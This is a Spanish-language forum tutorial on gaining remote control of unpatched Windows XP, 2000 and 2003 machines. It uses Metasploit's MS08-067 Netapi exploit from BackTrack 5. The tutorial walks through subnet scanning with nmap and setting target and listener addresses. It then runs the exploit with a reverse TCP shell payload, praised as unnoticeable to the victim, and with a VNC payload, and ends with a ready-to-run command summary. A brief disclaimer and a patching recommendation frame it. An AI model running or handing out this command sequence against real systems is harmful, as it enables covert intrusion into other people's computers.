en este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.
Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de como iniciar Backtrack 5 desde un CD.
Comenzamos...
1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:
Código: [Seleccionar]
ifconfig
Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.
2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente
Código: [Seleccionar]
nmap -sS -O [Rango de IP]
Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255
http://i49.servimg.com/u/f49/17/29/41/45/dibujo10.jpg
Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.
3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:
Código: [Seleccionar]
msfconsole
4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:
Código: [Seleccionar]
use exploit/windows/smb/ms08_067_netapi
5- Seteamos como objetivo a la IP de la PC con windows XP:
Código: [Seleccionar]
set RHOST [IP Objetivo]
Ejemplo: set RHOST 10.0.0.4
6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"
"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.
Cargamos escribiendo lo siguiente:
set PAYLOAD windows/shell/reverse_tcp
7- Seteamos con nuestra IP local:
Código: [Seleccionar]
set LHOST [IP Local]
Ejemplo: set LHOST 10.0.0.3
8- Enviamos el exploit:
Código: [Seleccionar]
exploit
Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.
Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.
Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.
9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.
10- Cargamos el Payload escribiendo:
Código: [Seleccionar]
set PAYLOAD windows/vncinject/reverse_tcp
11- Seteamos con nuestra IP local:
Código: [Seleccionar]
set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3
12- Enviamos el exploit escribiendo:
Código: [Seleccionar]
exploit
Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!
Resumen de los comandos utilizados:
Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4
Código: [Seleccionar]
msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit
Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.
Se recomienda actualizar windows XP para evitar este tipo de ataques.
espero les ayude meramente infomativo. para ser probado virtualmente.
disculpen por las imágenes aun no me familiarizo en colocar fotos xD